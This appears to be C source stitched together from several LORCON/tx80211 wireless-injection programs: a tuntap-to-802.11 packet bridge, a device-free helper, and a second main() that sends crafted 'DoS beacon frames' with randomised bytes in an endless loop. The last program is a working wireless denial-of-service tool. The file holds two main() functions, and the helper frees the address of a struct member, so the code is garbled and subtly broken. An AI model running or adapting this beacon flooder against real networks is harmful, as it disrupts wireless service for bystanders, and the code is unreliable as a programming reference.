int main(int argc, char *argv[])
{
struct tx80211 in_tx;
struct tx80211_packet in_packet;
struct ifreq ifr;
int ret = 0, channel = 0, c = 0, ttfd = -1, intfd = -1, flags = 0;
int drivertype = INJ_NODRIVER;
char iface[16 + 1];
char tface[16 + 1];
char errstr[PCAP_ERRBUF_SIZE + 1];
pcap_t *pd;
const u_char *pcap_pkt;
struct pcap_pkthdr pcap_hdr;
memset(iface, 0, sizeof(iface));
memset(tface, 0, sizeof(tface));
while ((c = getopt(argc, argv, "i:t:d:c:")) != EOF) {
switch (c) {
case 'i':
strncpy(iface, optarg, sizeof(iface) - 1);
break;
case 't':
strncpy(tface, optarg, sizeof(tface) - 1);
break;
case 'd':
drivertype = tx80211_resolvecard(optarg);
break;
case 'c':
if (sscanf(optarg, "%d", &channel) != 1) {
fprintf(stderr,
"%s: Illegal channel on cmd line",
argv[0]);
usage();
return -1;
}
break;
default:
break;
}
}
if (!strlen(iface)) {
fprintf(stderr, "Must specify an interface name.\n");
usage();
return -1;
}
if (!strlen(tface)) {
fprintf(stderr, "Must specify a tuntap interface name.\n");
usage();
return -1;
}
if (drivertype == INJ_NODRIVER) {
fprintf(stderr, "Driver name not recognized.\n");
usage();
return -1;
}
if (tx80211_init(&in_tx, iface, drivertype) < 0) {
perror("tx80211_init");
return -1;
}
/* Create the tuntap device */
if ((ttfd = open("/dev/net/tun", O_RDWR)) < 0) {
perror("Could not open /dev/net/tun control file");
return -1;
}
memset(&ifr, 0, sizeof(ifr));
ifr.ifr_flags = (IFF_TAP | IFF_NO_PI);
strncpy(ifr.ifr_name, tface, sizeof(tface) - 1);
if (ioctl(ttfd, TUNSETIFF, (void *) &ifr) < 0) {
perror("Unable to create tuntap interface");
return -1;
}
/* bring the tuntap up */
if ((intfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) {
perror("Failed to create AF_INET socket");
return -1;
}
memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, tface, IFNAMSIZ);
if (ioctl(intfd, SIOCGIFFLAGS, &ifr) < 0) {
perror("Failed to get interface flags for tuntap");
return -1;
}
flags = ifr.ifr_flags;
flags |= (IFF_UP | IFF_RUNNING | IFF_PROMISC);
ifr.ifr_flags = flags;
if (ioctl(intfd, SIOCSIFFLAGS, &ifr) < 0) {
perror("Failed to set interface flags for tuntap");
return -1;
}
close(intfd);
/* Set monitor mode */
ret = tx80211_setmode(&in_tx, IW_MODE_MONITOR);
if (ret != 0) {
fprintf(stderr, "Error setting mode, returned %d.\n", ret);
return 1;
}
/* Switch to the given channel */
ret = tx80211_setchannel(&in_tx, channel);
if (ret < 0) {
fprintf(stderr, "Error setting channel, returned %d.\n", ret);
return 1;
}
/* Open the interface to get a socket */
ret = tx80211_open(&in_tx);
if (ret < 0) {
fprintf(stderr, "Unable to open interface %s.\n", in_tx.ifname);
return 1;
}
/* Open the pcap interface */
pd = pcap_open_live(tface, MAX_PACKET_LEN, 1, 1000, errstr);
if (pd == NULL) {
perror("Failed to open tuntap with pcap");
fprintf(stderr, "%s\n", errstr);
return 1;
}
fprintf(stderr, "Linked %s to %s, waiting for packets...\n", tface, iface);
while (1) {
if ((pcap_pkt = pcap_next(pd, &pcap_hdr)) == NULL) {
pcap_perror(pd, "Failed to get next packet from tuntap");
break;
}
in_packet.packet = (u_char *) pcap_pkt;
in_packet.plen = pcap_hdr.caplen;
ret = tx80211_txpacket(&in_tx, &in_packet);
if (ret < 0) {
fprintf(stderr, "Unable to transmit packet, returned %d.\n", ret);
perror("tx80211_txpacket");
break;
}
}
tx80211_close(&in_tx);
return 0;
}
void lorcon_device_free(struct rldev *rld) {
if (tx80211_getmode(&rld->in_tx) >= 0) {
tx80211_close(&rld->in_tx);
}
free(&rld->in_tx);
}
int
main(int argc, char **argv)
{
struct tx80211 tx;
struct tx80211_packet pkt;
char p1[BEACON_NOSSID_LEN];
char p2[BEACON_SSID_LEN];
int ret, drivertype;
uint8_t randbyte;
if (argc < 3) {
usage(argv);
return 0;
}
printf("[+] Initializing interface %s...\n", argv[1]);
drivertype = tx80211_resolvecard(argv[2]);
if (drivertype == INJ_NODRIVER) {
printf("[-] Driver name not recognized.\n");
exit(1);
}
ret = tx80211_init(&tx, argv[1], drivertype);
if (ret < 0) {
printf("[-] Error initializing %s/%s", argv[1], argv[2]);
exit(1);
}
ret = tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON);
if (ret != 0) {
printf("[-] Error setting monitor mode.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
ret = tx80211_setchannel(&tx, 11);
if (ret < 0) {
printf("[-] Error setting channel.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
ret = tx80211_open(&tx);
if (ret < 0) {
printf("[-] Unable to open interface %s\n", tx.ifname);
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
srand(time(NULL));
memcpy(p1, BEACON_NOSSID, BEACON_NOSSID_LEN);
memcpy(p2, BEACON_SSID, BEACON_SSID_LEN);
printf("[+] Injecting crafted DoS beacon frames...\n");
while (1) {
randbyte = rand() & 0xff;
p1[15] = randbyte;
p1[21] = randbyte;
p2[15] = randbyte;
p2[21] = randbyte;
pkt.packet = p1;
pkt.plen = BEACON_NOSSID_LEN;
if (tx80211_txpacket(&tx, &pkt) < 0) {
printf("[-] Unable to transmit packet.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
pkt.packet = p2;
pkt.plen = BEACON_SSID_LEN;
if (tx80211_txpacket(&tx, &pkt) < 0) {
printf("[-] Unable to transmit packet.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
}
tx80211_close(&tx);
return 0;
}
